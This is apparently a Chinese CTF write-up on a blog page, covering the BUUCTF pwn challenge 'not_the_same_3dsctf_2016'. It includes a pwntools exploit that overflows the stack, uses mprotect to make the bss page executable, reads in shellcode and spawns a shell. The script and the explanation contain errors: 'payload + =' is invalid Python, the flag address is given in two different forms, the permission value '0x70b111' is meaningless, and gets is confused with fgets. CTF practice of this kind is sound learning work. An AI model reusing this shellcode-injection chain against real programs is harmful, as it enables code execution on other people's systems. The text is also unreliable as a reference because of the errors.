buu not_the_same_3dsctf_2016

buu not_the_same_3dsctf_2016

刚拿到题

刚打开的时候很懵,main函数里只有一个fopen函数和一个fgets函数,点半天也没查到什么。没有办法,shift+f12 :查看程序内的字符串,发现了flag.txt

双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置。我们找到了flag的位置。接下来就要尝试把它读取出来就好了。

到这里,结合一开始看见的gets函数,得到了第一个思路:利用gets函数覆盖返回地址去读出flag → 利用get_secret函数覆盖地址到write函数的地址,打印unk_80CF91B里面的flag.txt。

但是这个方法不行,主要原因有以下几点:

  • fgets函数能够避免溢出
  • fl4g在bss段内,没有ret指令可以继续控制程序

后来在程序了发现了mprotect函数,可以用它来修改我们内存栈的权限,让它可读可写可执行,接着让写入shellcode,然后执行获取shell

from pwn import *

context(log_level='debug', arch='i386')

proc_name = './not_the_same_3dsctf_2016'
p = process(proc_name)
elf = ELF(proc_name)
bss_start_addr = elf.bss() & ~(elf.bss() % 0x1000)
mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
# 0x080483b8 : pop esi ; pop edi ; pop ebp ; ret
pop = 0x080483b8
payload = 'a'.encode() * (0x2d) + p32(mprotect_addr) 
payload + = p32(pop) + p32(bss_start_addr) + p32(0x100) 
payload + = p32(0x7) + p32(read_addr) + p32(bss_start_addr) 
payload + = p32(0) + p32(bss_start_addr) + p32(0x100)
p.sendline(payload)
payload1 = asm(shellcraft.sh())
p.sendline(payload1)
p.interactive()
  • 首先0x2d是main函数中栈空间的大小,它的下一个位置就是ret指令对应的返回地址了
  • p32(mprotect_addr)就是mprotect函数的地址,接下来的p32(pop)是为了保持栈平衡而将后面压入的三个参数从栈上弹出,弹出后我们并不使用它,就是为了控制栈的结构,p32(pop)的位置也同样是执行完mprotect后的返回地址,pop对应的指令为pop esi ; pop edi ; pop ebp ; ret,最后ret就跳转到p32(read_addr)这里了
  • 最后,p32(read_addr)的下一个p32(bss_start_addr)也是执行完read函数后跳转的地址,后面是read的三个参数

整个思路就是,利用mprotect函数修改bss段为0x70b111,可读可写可执行权限,然后利用read函数读入shellcode,最后跳转到shellcode的位置,就成功拿到shell了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值